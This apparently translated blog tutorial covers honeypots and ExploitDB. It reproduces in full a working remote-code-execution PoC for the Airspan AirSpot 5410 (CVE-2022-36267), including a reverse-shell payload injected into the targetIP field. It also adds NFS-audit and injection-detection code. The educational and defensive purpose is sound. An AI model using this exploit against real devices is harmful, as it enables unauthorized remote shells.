iT邦幫忙

2022 iThome 鐵人賽 (iThome Ironman Contest)

DAY 15
Security

Series: 不想上班系列 ("Don't Want to Go to Work" series), part 15

[Day 15] Intelligence-gathering tools: honeypot, ExploitDB


Honeypot

  • A purpose-built system that imitates a production machine. Resources are placed in an environment attackers can easily find, and the honeypots are centrally monitored. The goal is to lure attackers into attacking, then analyze their techniques and how to defend against them
    • On the Internet, attackers are constantly scanning shared environments that have no access restrictions; for example, an NFS share with no IP restriction is world-readable, and once an IP has been singled out the account password can be brute-forced
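The NFS case above is something a defender can check for directly on their own hosts. The following is an added example (not from the original post) that parses an /etc/exports file and flags exports with no client restriction, world-writable exports, and no_root_squash. The sample exports content is constructed, and the audit rules are this example's own assumptions about what an "unrestricted" export looks like.

```python
import re

# Constructed sample /etc/exports (not from the post). /srv/public and
# /srv/scratch are the "no IP restriction, world-readable" case described above.
SAMPLE_EXPORTS = """\
# NFS exports (constructed sample)
/srv/public   *(ro,sync,no_subtree_check)
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/home     192.168.1.5(rw,sync) 192.168.1.6(rw,sync)
/srv/scratch  (rw,sync)
"""

# One client spec: optional host part followed by an optional (options) list.
CLIENT_RE = re.compile(r'^([^(]*)(?:\(([^)]*)\))?$')


def parse_exports(text):
    """Parse exports(5) text into [(path, [(host, [option, ...]), ...]), ...]."""
    exports = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # strip comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], []
        for token in fields[1:]:
            m = CLIENT_RE.match(token)
            if not m:
                continue
            host = m.group(1)                       # '' or '*' means any host
            opts = [o for o in (m.group(2) or '').split(',') if o]
            clients.append((host, opts))
        if not clients:                             # bare path: exported to everyone
            clients.append(('', []))
        exports.append((path, clients))
    return exports


def is_unrestricted(host):
    """True when the client spec does not limit the export to named hosts or networks."""
    return host in ('', '*')


def audit_exports(text):
    """Return a list of finding strings for exports that invite the scanning described above."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            shown = host or '<none>'
            if is_unrestricted(host):
                mode = 'writable' if 'rw' in opts else 'readable'
                findings.append('%s: %s by any host (client spec %s)' % (path, mode, shown))
            if 'no_root_squash' in opts:
                findings.append('%s: no_root_squash for %s lets remote root act as local root' % (path, shown))
    return findings


if __name__ == '__main__':
    for finding in audit_exports(SAMPLE_EXPORTS):
        print('[!]', finding)
```

Run it against a real file with `audit_exports(open('/etc/exports').read())`. A client spec of `*`, or an options list with no host in front of it (the `/srv/scratch` line), both mean "any host", which is exactly the configuration the scanners described above are looking for.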

ExploitDB

  • Vulnerability database
    • Sample:
      • Taking Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) as the example

        • Remote Code Execution means commands can be submitted and executed through the browser, allowing the attacker to run arbitrary commands or modify code
        • Usually rated as high risk
      • Below is the sample code provided by the exploit author, demonstrating how the RCE attack is carried out

      """
       作者介紹code的用意
      """
      
      # Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
      # Date: 7/26/2022
      # Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
      # Vendor Homepage: https://www.airspan.com/
      # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
      # Version: 0.3.4.1-4 and under.
      # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
      # CVE : CVE-2022-36267
      
      from __future__ import print_function, unicode_literals
      import argparse
      import requests
      import urllib3
      urllib3.disable_warnings()
      
      def banner():
        airspanLogo = """ 
            ,-.
           / \  `.  __..-,O
          :   \ --''_..-'.'
          |    . .-' `. '.
          :     .     .`.'
           \     `.  /  ..
            \      `.   ' .
             `,       `.   \
            ,|,`.        `-.\
           '.||  ``-...__..-`
            |  | Airspan 
            |__| AirSpot 5410
            /||\ PWNED x_x
           //||\\
          // || \\
       __//__||__\\__
      '--------------'Necrum Security Labs
      
      \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                      FOR EDUCATIONAL PURPOSE ONLY.   
        """
        return print('\033[1;94m{}\033[1;m'.format(airspanLogo))
      
      """
      測試是否可以進行遠程連接
      """
      def pingWebInterface(RHOST, RPORT):
        url = 'https://{}:{}'.format(RHOST, RPORT)
        try:
          response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
          if response.status_code != 200:
            print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
            exit()
          print('[INFO] Airspan device web interface seems reachable!')
        except:
          print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
          exit()
      
      
      """
      Reverse Shell
      在目標主機上對攻擊主機發起連線
      
      設定好payload&query,打request過去,target ip用了CloudFlare的1.1.1.1,若是有回應代表可進行遠程連接
      """
      def execReverseShell(RHOST, RPORT, LHOST, LPORT):
        payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
        data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
        try:
          print('[INFO] Executing reverse shell...')
          response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
          print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
          return
        except Exception as e:
            print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
            return False
      
      def main():
        banner()
        args = parser.parse_args()
        pingWebInterface(args.RHOST, args.RPORT)
        execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
      
      
      if __name__ == "__main__":
        parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
        parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
        parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
        parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
        parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
        main()
      
      
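The PoC above works because the `targetIP` field of the `pingDiagnostic` command is spliced into a shell command unvalidated. The following is an added example (not from the post or the exploit author) showing, in Python, how a defender would handle the same field: strict IP validation, building the ping command as an argv list so no shell parses user input, and a detection check that URL-decodes request bodies and flags shell metacharacters in `targetIP`. The request bodies are constructed samples, and the ping flag layout is this example's assumption rather than the device's real command.

```python
import ipaddress
from urllib.parse import parse_qs

# Shell metacharacters that can never appear in a well-formed IP address but
# let a value spliced into a shell string escape the intended command.
SHELL_META = set('`$;|&<>(){}\n\r\\\'"')

# Constructed request bodies (not from the post) in the shape the endpoint
# above accepts: one ordinary ping, one with backticks inside targetIP.
BENIGN_BODY = 'Command=pingDiagnostic&targetIP=8.8.8.8&packetSize=55&timeOut=10&count=1'
SUSPICIOUS_BODY = 'Command=pingDiagnostic&targetIP=1.1.1.1%60id%60&packetSize=55&timeOut=10&count=1'


def validate_target_ip(value):
    """Return the canonical IPv4/IPv6 form of value, or None if it is not an address."""
    try:
        return str(ipaddress.ip_address(str(value).strip()))
    except ValueError:
        return None


def _bounded_int(value, lo, hi):
    """Parse an integer field and enforce a sane range; None on any failure."""
    try:
        n = int(value)
    except (TypeError, ValueError):
        return None
    return n if lo <= n <= hi else None


def build_ping_argv(target_ip, count=1, packet_size=55, timeout=10):
    """Build the ping invocation as an argv list for subprocess.run(argv), so no
    shell ever parses user input. Returns None if any field fails validation.
    The flag layout is this example's assumption, not the device's real command."""
    ip = validate_target_ip(target_ip)
    n = _bounded_int(count, 1, 10)
    size = _bounded_int(packet_size, 1, 1472)
    wait = _bounded_int(timeout, 1, 60)
    if None in (ip, n, size, wait):
        return None
    return ['ping', '-c', str(n), '-s', str(size), '-W', str(wait), ip]


def targetip_indicators(body):
    """Detection side: URL-decode a diagnostics request body and return the
    sorted list of shell metacharacters found in targetIP (empty when the
    value is a plain IP address)."""
    params = parse_qs(body, keep_blank_values=True)   # parse_qs also URL-decodes
    raw = params.get('targetIP', [''])[0]
    if validate_target_ip(raw) is not None:
        return []
    return sorted(c for c in set(raw) if c in SHELL_META)


def scan_bodies(bodies):
    """Return [(index, indicators)] for every body whose targetIP looks injected."""
    hits = []
    for i, body in enumerate(bodies):
        found = targetip_indicators(body)
        if found:
            hits.append((i, found))
    return hits


if __name__ == '__main__':
    print(build_ping_argv('8.8.8.8'))
    print(scan_bodies([BENIGN_BODY, SUSPICIOUS_BODY]))
```

The validation side rejects the whole request rather than trying to strip "bad" characters, and the argv list means that even a value that slipped through would be handed to ping as a single argument, never to a shell. The detection side is deliberately narrow: a `targetIP` that is not an address but contains no metacharacters (for example a hostname) returns no indicators, so it is a low-noise signal for the specific injection pattern the post shows, not a general anomaly detector.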
